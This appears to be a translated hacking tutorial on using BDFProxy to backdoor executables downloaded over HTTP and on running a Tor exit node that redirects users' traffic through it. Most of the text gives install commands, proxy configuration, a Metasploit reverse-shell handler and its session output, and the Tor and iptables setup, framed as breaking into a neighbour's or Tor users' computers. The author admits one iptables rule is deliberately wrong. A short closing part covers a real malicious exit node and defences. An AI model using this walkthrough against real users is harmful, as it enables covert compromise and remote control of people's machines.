I guess you have heard about Evilgrade framework that allows to “fix” the update mechanism of the most popular programs (Windows update, Apple update and so on and so forth) by replacing valid files with malicious ones. You probably think that only the application’s updates are vulnerable? Well, you are wrong. I shall be honest with you, it is not that secure to download files from the web as it might be seemed from the first sight. Don’t believe me? Then look, or better say, read.
Instead of introduction
To penetrate into an ordinary user’s workstation is quite a complicated task. After all, unlike servers with great amount of additional software ( web-servers, DBMS, FTP-servers…) that actually increases that chances to find a way to get a remote shell, in case of an ordinary workstation we barely can gain a foothold. Let’s say you would like to get a remote access to your neighbour Vasya’s computer. And our absent-minded Vasya has forgotten to turn off an automatic system update, so there is no way to get in using some old-fashioned exploit. So, the situation is not easy but not like a blind alley. Here we can count on our skills of social engineers or, for example, use Evilgrade, as long as Vasya has his auto updates turned on! But there is another way as well – BDFProxy.
BDFProxy is a tool that has been developed from two different instruments. Initially, the author of BDFProxy Joshua Pitts created the tool called The Backdoor Factory that actually was designed to automate patching of the files in order to plug in backcodes which might be quite crucial for penetration testing. There is another one, mitmproxy, which is a Python proxy-server that can catch HTTP, change traffic on the fly, replay traffic, decode and render primitive data types. By means of crossing of those two tools we got BDFProxy. How it works? The tool can patch on fly the binaries downloading by a victim. And now, just imagine, how many official websites share their programs via HTTP. Well, moreover, a lot of quite big companies, like Sysinternals, Microsoft, Malwarebytes, SourceForge, Wireshark, as long as a great amount of Antivirus Companies do that. So, while most of the antivirus products can detect data integrity damaging, the regular software does not fit up with such functions. Which means that its modification rest unnoticed by a user.
Let’s drop off all the irrelevant stuff and check what this tool is capable of. First and foremost, we need further packages: up to date version of Pefile, ConfigObj, mitmproxy, BDF ( also the last one), Capstone ( part of BDF). So, we need to copy BDFProxy to a homonym folder and launch the installation:
git https://github.com/secretsquirrel/BDFProxy BDFProxy/ ./install.sh
Then we are just sitting and waiting. However, if you do not have the ‘pip’ installed on your computer then you will need to install the
pefile library manually:
wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz tar -zxvf pefile-1.2.10-139.tar.gz python setup.py install
Thus, everything is ready to use. According to the author, before every launch we should run the update command in case of changes and renews:
So, here we are facing the most interesting part – configuration, that we can find in
bdfproxy.cfg file. Let’s check what we have there. Well, beside the set up of proxy port (
proxyPort = 8080), place for logs (
logname = proxy.log) and arrangement of the log level (
loglevel = INFO), we can find there white and black worksheets. The white ones are those to be patched, while the black ones not. These worksheets are designed as for hosts where we point out from which servers the binaries needed to be patched and from which not ( default mode ALL means that all the binaries will be patched), so for the key words where we put all the data that should not be patched in a black list. For example, executable files of popular programs and DLL – libraries:
blacklist = Tcpview.exe, skype.exe, .dll. Also, the configuration allows to adjust settings for every executable file’s type for Windows/Linux х86/х64. Well, that’s enough about configuration – everything about it is quite simple and understandable, let’s proceed to actions.
After we have everything installed, we can, finally, launch our tool and hack ourselves in a best possible way. Run the tool:
Then we have the response:
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Starting BDFProxy
As we can see a new file has appeared
bdfproxy_msf_resource.rc. There we can find how to use it:
msfconsole -r bdfproxy_msf_resource.rc
You, probably, have already undrestood that the msfconsole is the most popular MSF interface. It is kind of “ ALL IN ONE” solution, the console desk is centralised and provide access to almost every option available in the Metasploit Framework. At the first sight the Msfconsole could seem slightly mixed-up and not really clear, however, when you start to understand the command syntax, you start to appreciate the great effectiveness of the interface usage. Returning to our console dest, we are completing the set-up:
msf > use multi/handler msf exploit(handler) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(handler) > set LPORT 8443 LPORT => 8443 msf exploit(handler) > exploit -z -j
Now, when we will be downloading some binary from the web it going to be patched on the fly and, at the same time, it will be quite difficult for antivirus programs to detect it. Plus, after the launch we have a fully-featured shell on the remote computer. All you need to do so far is to connect to it and rule it at your own pleasure:
msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- --------- 1 shell windows 192.168.0.1:8443 -> 192.168.0.109:11162 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1… Microsoft Windows Copyright (c) 2009 Microsoft Corporation.
Test in service
Well, in order to run such an attack in the real conditions, it is necessary to put the BDFProxy between a victim and the global or local LAN. There are several ways to run MITM and it depends on the situation which one to choose. As for us, we are going to use BDFProxy and Tor “ in cahoots” instead of running the ARP-Spoofing or sending DNS-cash. As you can remember, the exit node can only catch the sights of “pure” traffic, so, nothing is stopping us to sent it through the Backdoor Factory Proxy in order to modify the executed files downloading by users.
As for the launching ground we are going to use Kali Linux, however, any other distributive will be ok. If you still do not have the Tor installed on your computer, it is time to launch this:
apt-get install tor
so, we are ready to set it up.
Setting up the Tor
First, we need to understand which configuration parameters we will need.
ControlPort this port will enable the Tor to receive connections to operate Tor-server.
DirPort here the Tor is going to receive data from the directory server. Let’s install them, for example, like this:
ControlPort 9051 DirPort 9030
ExitPolicy determine which traffic is going to be received or forwarded. It has further format
ExitPolicy Accept | reject address:port. We can run something like this:
ExitPolicy accept *:80 ExitPolicy accept *:443 ExitPolicy accept *:110 ExitPolicy accept *:143 ExitPolicy accept *:993 ExitPolicy accept *:995 ExitPolicy reject *:*
Thereby we are going to divide the whole traffic, except for the further ports 80, 443, 110, 143, 993 и 995. We can add or remove something as an option. As the phrase goes –
A man is the king in his house.
HashedControlPassword the hash for password to access and to configure
the Tor server can be done using this command:
Nickname – is the name of our server.
ORPort – is the port receiving connections from other nodes.
SocksListenAddress — is the address that will be used by Tor to receive connections from applications based on SOCKS. Format:
SocksListenAddress IP[:PORT]. Let’s set the IP as
127.0.0.1 and leave the default mode ( 9050) of the port. We need such configuration if we will use Tor in combination with Privoxy or other proxies.
The end part of the configuration will look somehow like this:
HashedControlPassword 16:91495A0B7CBC41C76073E1EC00A5CF1510D41462884391CCB24BF489F1 Log notice stdout # Выводим сообщения в консоль Nickname BDFProxy ORPort 9001 SocksListenAddress 127.0.0.1
Now, let’s run the Tor:
tor -f /home/toruser/.tor/torrc
After a little while our computer become a full-featured exit-node! By the way, I highly recommend you to create a separate user in order to run the Tor instead of launching it using the root.
Well, we are not satisfied with what has been already achieved. Hope you have not forgotten why we have been doing all that. All that is left to do is to forward the income traffic to our BDFProxy and track the appearance of new sessions in Metasploit, which will mean that the patched binary has been successfully launched by a victim. In order to do that we will use iptables:
iptables -t nat -A PREROUTING -p tcp --sport 80 -j DNAT --to-destination 127.0.0.1:8080
As long as the Tor does not work properly yet and has some shakes from time to time, we gave you not really correct ( or better say not correct at all ;)) rule for the packet filter so your experiments will not destroy the whole project. However, if you want to come down to brass backs, then your home task is to find out the way how to correct all the screwups.
A case of binary modification
I guess you have already heard that the experts from the Leviathan Security Group found the Tor’s malicious node in Russia. After the disclosure, the researchers tried to imitate such an attack. Likewise, downloading the modified package with Windows Update, the system throw an error message 0x80200053. This code point out the problem with signature check-up of the downloading binary. However, when we google the solution for such problem and follow the very first link we will get to the Microsoft offsite where will find the way how to repair this error with a link for path. The truth is that the path is also modified, and as long as it will be installing without using Auto Update Service but separately it will not be checked for data integrity damaging. Should I explain the scale and possibilities of such nodes so far?
Currently, the news about the malicious node have already been reported to Tor and it has been marked as BadExit. Nevertheless, we should mention that among 1110 exit nodes in Tor LAN only this one added malicious codes to binaries. The rest nodes have been checked and they do not do anything similar. Although, we can not be 100% sure, as long as nodes could act selectively and modify only a part of files in order to not being detected during the check-up. Beside the point, the Symantec company added their two cents,finding malicious node. The virus that have been added to binaries, was designed for further software: Windows XP, Windows 2000, Windows Vista и Windows 7. Antivirus detect it as a Backdoor.Miniduke! GEN4. After the penetration the program connects with its creators via twitter microblog, searching for twits in the accounts that had been created by hackers in advance. Using these links, it download the core part of the code. So, the upload is performed in several stages, after what the malicious code start to act as a Backdoor, giving access to all the data on the victim’s computer to hacker.
How to protect yourself
Well, and now couple words about countercheck measures.
The most banal and effective in terms of this situation is to use SSL/TLS. Anyway, how to make implementers of the resources from which you download files use it? Another way is to check the cashes of the real file and the one that have been downloaded. If you still have any suspicions you can use VirusTotal or similar resources, so if any existing signature have been added you will get a pile of virus detections.
How to check a Tor node
To check an exit node you can use a special tool called exitmap, it is a quick expandable scanner for exit nodes on Pyton, quite useful tool to control exit nodes’ safety and authenticity. Also, I recommend to use further script patchingCheck.py, that nicely detect binaries’ modifications and tell us immediately if it finds anything. If you did not like the exitmap, have a look on this torscanner, that have quite simple principle of work, it just download different links from the web and compare them with the information that it get from Tor exit node, in case of misfits it “raise hell”. Beside, we should have a look on DetecTor, designed to fight MITM in Tor- LANs.
Tor is a great tool to be protected, however it can not guarantee the safety. And we should not forget about this. As you can see, the core idea is quite clear, do not trust anybody and check received data: you will never know what exactly you have downloaded in a “piping hot” binary. To make all this on your server is not a big deal, moreover, if you have a target to get in the market of applications and software, than the chances to be caught are not too high. So, honour the Criminal Code of Russian Federation, wear a white hat and always check your cashes.